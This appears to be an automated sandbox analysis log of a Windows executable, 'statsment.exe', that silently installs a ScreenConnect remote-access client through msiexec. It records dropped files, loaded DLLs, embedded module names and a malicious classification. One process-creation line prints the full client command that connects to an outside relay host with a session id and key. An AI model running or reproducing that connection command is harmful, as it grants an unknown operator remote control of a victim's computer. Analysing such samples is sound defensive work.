Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}\DefaultIcon
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\Installer\wix{98F14B4D-F652-F7B9-4AEF-F8F43E2034FC}.SchedServiceConfig.rmi
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\tvo2klqv.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\tvo2klqv.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSID438.tmp
Source: C:\Users\user\Desktop\statsment.exe Code function: 0_2_05426F00
Source: C:\Users\user\Desktop\statsment.exe Code function: 0_2_05429F00
Source: C:\Users\user\Desktop\statsment.exe Code function: 0_2_0542EEB0
Source: C:\Users\user\Desktop\statsment.exe Code function: 0_2_05426EF1
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 8_2_00007FFD9B3E70BA
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 8_2_00007FFD9B40F470
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 8_2_00007FFD9B3E10D7
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 8_2_00007FFD9B3E10CF
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 8_2_00007FFD9B6F5BC1
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 8_2_00007FFD9B6F627B
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 8_2_00007FFD9B6F00F5
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 8_2_00007FFD9B6F6D9E
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B3F10D7
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B3F10CF
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B7003CD
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B70E3B6
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B70298B
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B70F162
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFD9B706E4D
Source: statsment.exe Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: statsment.exe Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: statsment.exe, 00000000.00000002.1712693773.0000000003D03000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statsment.exe
Source: statsment.exe, 00000000.00000002.1714886742.00000000051E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamelibwebp.dllB vs statsment.exe
Source: statsment.exe, 00000000.00000002.1714886742.00000000051E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamezlib.dll2 vs statsment.exe
Source: statsment.exe, 00000000.00000002.1714886742.00000000051E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statsment.exe
Source: statsment.exe, 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statsment.exe
Source: statsment.exe, 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamelibwebp.dllB vs statsment.exe
Source: statsment.exe, 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamezlib.dll2 vs statsment.exe
Source: statsment.exe, 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statsment.exe
Source: statsment.exe, 00000000.00000000.1684869140.0000000000256000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statsment.exe
Source: statsment.exe, 00000000.00000002.1698052855.0000000002970000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs statsment.exe
Source: statsment.exe, 00000000.00000002.1714490223.0000000005130000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statsment.exe
Source: statsment.exe, 00000000.00000002.1714809217.00000000051C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statsment.exe
Source: statsment.exe, 00000000.00000002.1696612899.0000000000D41000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsiexec.exe.muiX vs statsment.exe
Source: statsment.exe, 00000000.00000002.1720865498.0000000007954000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewixca.dll\ vs statsment.exe
Source: statsment.exe, 00000000.00000002.1716747544.00000000055EC000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs statsment.exe
Source: statsment.exe, 00000000.00000002.1716747544.00000000055EC000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSfxCA.dllL vs statsment.exe
Source: statsment.exe, 00000000.00000002.1716747544.00000000055EC000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamewixca.dll\ vs statsment.exe
Source: statsment.exe, 00000000.00000002.1716747544.00000000055EC000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statsment.exe
Source: statsment.exe, 00000000.00000000.1684869140.000000000077F000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statsment.exe
Source: statsment.exe, 00000000.00000000.1684869140.000000000077F000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs statsment.exe
Source: statsment.exe Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statsment.exe
Source: statsment.exe Binary or memory string: OriginalFilenamelibwebp.dllB vs statsment.exe
Source: statsment.exe Binary or memory string: OriginalFilenamezlib.dll2 vs statsment.exe
Source: statsment.exe Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statsment.exe
Source: statsment.exe Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statsment.exe
Source: statsment.exe Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs statsment.exe
Source: statsment.exe Binary or memory string: OriginalFilenameSfxCA.dllL vs statsment.exe
Source: statsment.exe Binary or memory string: OriginalFilenamewixca.dll\ vs statsment.exe
Source: statsment.exe Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statsment.exe
Source: statsment.exe Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs statsment.exe
Source: statsment.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.statsment.exe.5130000.1.raw.unpack, CursorBuffer.cs Cryptographic APIs: 'TransformBlock'
Source: 0.0.statsment.exe.2563d8.4.raw.unpack, CursorBuffer.cs Cryptographic APIs: 'TransformBlock'
Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsToolkit.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.statsment.exe.2dc3d8.3.raw.unpack, WindowsToolkit.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.statsment.exe.2dc3d8.3.raw.unpack, WindowsExtensions.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.0.statsment.exe.2dc3d8.3.raw.unpack, WindowsExtensions.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.0.statsment.exe.2dc3d8.3.raw.unpack, WindowsExtensions.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsExtensions.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsExtensions.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.statsment.exe.51e0000.3.raw.unpack, WindowsExtensions.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine Classification label: mal48.evad.winEXE@17/56@1/1
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)
Source: C:\Users\user\Desktop\statsment.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\statsment.exe.log
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Mutant created: NULL
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Users\user\Desktop\statsment.exe File created: C:\Users\user\AppData\Local\Temp\ScreenConnect
Source: statsment.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: statsment.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\statsment.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\statsment.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: statsment.exe Virustotal: Detection: 27%
Source: statsment.exe String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: statsment.exe String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
Source: C:\Users\user\Desktop\statsment.exe File read: C:\Users\user\Desktop\statsment.exe
Source: unknown Process created: C:\Users\user\Desktop\statsment.exe "C:\Users\user\Desktop\statsment.exe"
Source: C:\Users\user\Desktop\statsment.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8184DE85A5CB7E60E4BEE8460840EE70 C
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICAFF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5884812 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DF919848E655E7C7ACF0240BA4C9A705
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6E13845DE42F2DC1013E1DB414C7336A E Global\MSI0000
Source: unknown Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=882825b1-a7d4-4898-8af4-0ecb567917da&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Groups&c=&c=&c=&c=&c=&c=&c="
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "0cb4bca7-7067-4861-8f9f-7ae40c9c0413" "User"
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "b789ee53-da8d-4b10-9490-36f6b234bd89" "System"
Source: C:\Users\user\Desktop\statsment.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\statsment.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msihnd.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: srclient.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: spp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
